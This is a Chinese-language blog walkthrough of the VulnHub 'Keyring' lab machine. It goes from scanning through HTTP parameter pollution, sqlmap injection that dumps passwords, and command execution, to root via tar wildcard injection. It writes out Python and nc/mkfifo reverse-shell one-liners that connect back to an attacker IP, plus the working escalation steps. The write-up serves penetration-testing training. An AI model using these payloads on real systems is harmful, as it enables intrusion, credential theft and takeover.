靶机渗透练习10-Keyring (HPP漏洞)

最新推荐文章于 2023-07-03 09:34:11 发布
最新推荐文章于 2023-07-03 09:34:11 发布
阅读量4.7k 收藏
点赞数
分类专栏: 和我一起来打靶! 文章标签: 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forces_/article/details/123925833
版权

靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.56.108
22—ssh—OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80—http—Apache httpd 2.4.29 ((Ubuntu))

3、80端口分析
在这里插入图片描述
映入眼帘的是一个注册页面,那我们就随便注册个账号看看吧,填写test/test然后点击signup。显示注册成功,然后点击login进入登录界面输入刚才注册的账号
在这里插入图片描述
然后随便点点看看,在control处看到如下提示

HTTP Parameter Pollution or HPP in short is a vulnerability that occurs
due to passing of multiple parameters having same name
HTTP参数污染(简称HPP)是一个容易发生的漏洞
由于传递了多个同名参数

4、ok得到了提示但是还不知道利用点在哪。遇事不决,目录扫描再说~

gobuster dir -u “http://192.168.56.108/” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

在这里插入图片描述
一一尝试,访问/history.php发现是个空白页面,符合hpp的搜索隐藏信息的特点,我们猜测可能存在hpp漏洞

HTTP Parameter Pollution即HTTP参数污染,简称HPP。是web容器处理HTTP参数的一种方式。HTTP 参数污染 (HPP) 是一种 Web 攻击规避技术,允许攻击者通过更改 HTTP 请求以操纵或搜索隐藏信息。这种规避技术基于在具有相同名称的参数的多个实例之间拆分攻击向量。某些环境通过从请求中连接的参数名称的所有实例中获取的值来处理此类请求。

令人amazing的是登录用户访问history.php发现是个空白页面,而没登陆的时候访问/history.php出现以下提示
在这里插入图片描述
这确实有点像所谓的接口,但是直接在后面加上history.php?user=test,发现又没反应,登录了再访问发现才有结果显示。。

http://192.168.56.108/history.php?user=test

在这里插入图片描述
既然如此我们换成admin试试

http://192.168.56.108/history.php?user=admin

出现以下提示

Pages visited by user admin
https://github.com/cyberbot75/keyring

访问后发现是一个源码仓库,一一访问看看,当看到control.php源码的时候发现了
在这里插入图片描述
5、尝试命令执行,发现没有成功,应该是admin用户才能执行命令

http://192.168.56.108/control.php?cmdcntr=id

在这里插入图片描述
这时候想到:hpp漏洞一般用于sql和xss的waf绕过,既然我们有user参数,不妨尝试以下sql注入,直接用sqlmap跑一下

sqlmap -u “http://192.168.56.108/history.php?user=admin” --cookie=“PHPSESSID=e7gbkosbigmu9cfqjpr051o3fd” --dbs --batch

在这里插入图片描述
嗯哼,存在sql注入

sqlmap -u "http://192.168.56.108/history.php?user=admin" --cookie="PHPSESSID=e7gbkosbigmu9cfqjpr051o3fd" --batch -D users -T details --dump

得到管理员账号密码:admin | myadmin#p4szw0r4d 
于此同时还得到了一个奇奇怪怪的用户,看起来应该是系统用户:john  | Sup3r$S3cr3t$PasSW0RD

在这里插入图片描述
6、登录管理用账号尝试是否可以执行命令
在这里插入图片描述
成功执行命令
7、反弹shell(使用python反弹shell)

1、nc -lvnp 444
2、http://192.168.56.108/control.php?cmdcntr=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
3、切换交互书shell:python3 -c 'import pty;pty.spawn("/bin/bash")'

8、尝试提权
之前sql注入得到一个系统用户,尝试登录

su john
Sup3r$S3cr3t$PasSW0RD

在这里插入图片描述
在john的家目录发现一个文件compress而且它是以root权限运行的,看一下是什么文件

file compress

在这里插入图片描述
发现suid,把他下载下来看看内容

1、靶机开启http服务:python3 -m http.server
2、kali攻击机下载compress文件,查看文件内容
wget http://192.168.56.108:8000/compress
strings compress

在这里插入图片描述
思路:compress会执行tar程序,可以利用通配符注入来提权(详解在此:https://www.freebuf.com/articles/system/176255.html)

tar提权操作:
echo "/bin/bash" > exp.sh
echo "" > "--checkpoint-action=exec=sh exp.sh"
echo "" > --checkpoint=1
./compress
id

在这里插入图片描述
成功得到root权限,完结散花~

还可以这样操作:

1、kali开启监听:nc -lvnp 4444
2、
echo "mkfifo /tmp/lhennp; nc 192.168.56.101 5555 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
chmod +x shell.sh    #赋予执行权限
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *   #这一步省略,因为在compress文件中就可以执行这个命令
./compress #进行root权限反弹

总结:
1、接口寻找–>HPP漏洞利用
2、信息收集寻找漏洞
3、通配符注入提权–>tar提权

参考:
https://www.cnblogs.com/sainet/p/15772346.html
https://blog.csdn.net/lionwerson/article/details/121755655
https://mp.weixin.qq.com/s/CMWB5VoZ6N7sIqVob-R_rQ

佛系的新仔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
SQL注入漏洞原理,基本方法,绕过方法及防御
qq_62886656的博客
05-03 7821
目录 一,原理 二,如何注入? 1, 联合注入 2,基于错误的注入 3,布尔盲注 4,延时注入 三,绕过方法添加注释 四,防御方式 一,原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 从过程上分析,在前端构造一份表单,可以是输入账号密码,也可以是其他能够输入并提交的功能,向后端传输数据的时候,如果我
命令执行漏洞
qq_48904485的博客
03-21 1778
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令中执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令中执行。 2、PHP下命令执行函数 在PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
web安全】——命令执行漏洞(RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
web安全测试用例(网络资源笔记)
天在等我,菜鸟想飞
12-30 5203
信息泄漏 robots.txt泄漏敏感信息 **漏洞描述:**搜索引擎可以通过robots文件可以获知哪些页面可以爬取,哪些页面不可以爬取。Robots协议是网站国际互联网界通行的道德规范,其目的是保护网站数据和敏感信息、确保用户个人信息和隐私不被侵犯,如果robots.txt文件编辑的太过详细,反而会泄露网站的敏感目录或者文件,比如网站后台路径,从而得知其使用的系统类型,从而有针对性地进行利用。 测试方法: 检测形式多样,工具爬虫扫描得到敏感文件的路径,从而找到robots文件; 手工挖掘,直接在域名后输
渗透练习 Vulnhub靶场 Keyring
hljzzj的博客
02-15 1841
No.26 Keyring 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-keyring-101,718/ 靶场: VulnHub.com 靶机名称: IA: Keyring (1.0.1) 难度: 简单-中等 发布时间: 2021年7月30日 目标: 2个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -sP 19
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Spring Security通配符路由绕过漏洞(CVE-2023-20860)
murphysec的博客
03-23 4879
Spring Security 是一套为基于Spring的应用程序提供说明性安全保护的安全框架。 在受影响版本中,当Spring Security使用mvcRequestMatcher配置了**作为前缀的pattern时,其与Spring MVC的匹配逻辑存在差异,可能导致鉴权绕过。
WAF绕过,HPP漏洞学习--2023/03/18
m0_53689197的博客
03-18 248
护网学习--2023/03/18
[CTF]-PatriotCTF2022复现
Mr.木Mu
05-27 1210
PatriotCTF2022复现前言MiscApplesIt's All Greek to MeCryptoBarryBase64 Times 10No Postcode EnvyThe OrderTwoFiftyForensicsBannerBézierExfilFlexiSession SpyWebBoot_it_and_root_itChewy or CrunchyCurly FryInspectorClouseauLockedNot So SecretspongebobRock and Roll总结
HTTP参数污染
qq_39511050的博客
09-10 1855
HTTP参数污染
靶机渗透练习87-IA:Keyring (1.0.1)
hirak0的博客
04-30 1240
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ Description Difficulty: Intermediate Goal: Get the root shell and read all the 2 flags. Information: No hints will be provided before 24 hours of the release. Try Harder! If you need any hints,
网络安全进阶学习第五课——文件上传漏洞
最新发布
p36273的博客
07-03 3638
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
参数污染漏洞HPP)挖掘技巧及实战案例全汇总
Restart的博客
09-06 2045
概念: HTTP参数污染,也叫HPP(HTTP Parameter Pollution)。简单地讲就是给一个参数赋上两个或两个以上的值,由于现行的HTTP标准没有提及在遇到多个输入值给相同的参数赋值时应该怎样处理,而且不同的网站后端做出的处理方式是不同的,从而造成解析错误。 漏洞原理: 通过简单的案例可以说明这种处理的差异: 在不同的搜索引擎中进行搜索,在地址栏输入URL:?p=usa&p=china,这里重复相同搜索参数,观察搜索结果的不同: 1)百度接受第一个参数(usa)而放弃第二个参数(ch
Web应用里的HTTP参数污染(HPP漏洞
yggcwhat
02-18 605
HPP是HTTP Parameter Pollution的缩写。这个漏洞由S. di Paola 与L. Caret Toni在2009年的OWASP上首次公布。这也是一种注入型的漏洞,攻击者通过在HTTP请求中插入特定的参数来发起攻击。如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。下面对这个漏洞的原理做一下详细解释。 首先讲下HTTP的参数处理 在跟服务器进行交互的过程中,客户端往往会在GET/POST请求里面带上参数: GET /foo?par
Vulnhub-keyring靶机
lionwerson的博客
12-06 3003
keyring下载地址https://download.vulnhub.com/ia/keyring-v1.01.ova1.下载靶机,网络改为桥接模式然后打开靶机,nmap扫描一下: nmap.exe -p- 192.168.0.15 开放ssh的22端口和http的80端口,ssh端口无法登录,设置了只能用密钥登录。 先注册一个用户,admin用户显示已经被注册了,只能换一个注册: 后台非常简陋,看来不是cms,路径扫描找到一个history.php的文件。 histor.
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值